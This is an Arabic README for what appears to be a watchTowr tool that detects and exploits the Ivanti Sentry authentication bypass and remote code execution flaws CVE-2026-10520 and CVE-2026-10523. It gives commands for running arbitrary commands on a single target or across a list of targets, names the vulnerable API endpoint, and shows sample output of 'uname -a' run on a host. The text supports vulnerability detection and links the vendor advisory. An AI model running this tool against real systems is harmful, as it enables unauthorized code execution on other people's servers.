
مولّد عناصر كشف لثغرات تجاوز المصادقة وتنفيذ الأكواد عن بُعد (RCE) في Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). يفحص هدفًا واحدًا أو أهدافًا متعددة، وينفّذ الأوامر، ويُبلّغ عن المضيفين المعرّضين للخطر.
مولّد أدلة اكتشاف لتجاوز المصادقة وتنفيذ الأوامر عن بُعد في Ivanti Sentry.
انظر مقالنا على المدونة للتفاصيل الفنية.
$ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-2026-10523.py
(*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2026-10520, CVE-2026-10523]
============================================================
Target: https://127.0.0.1
Command: uname -a
[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
هدف واحد:
python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
أهداف متعددة من ملف (رابط واحد في كل سطر، مع تجاهل الأسطر الفارغة وتعليقات #):
python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"
استخدم وكيلًا (بروكسي):
python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080
يقوم وضع القائمة بفحص كل هدف، ويواصل العمل عند أخطاء الاتصال، ويطبع ملخصًا للمضيفات المعرّضة للخطر في النهاية.
يفحص مولّد أدلة الاكتشاف من watchTowr ثغرات تجاوز المصادقة وتنفيذ الأوامر عن بُعد في Ivanti Sentry: CVE-2026-10520 وCVE-2026-10523.
يمكن العثور على المعالجة والتفاصيل الإضافية داخل نشرة Ivanti الأمنية: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
الفضل: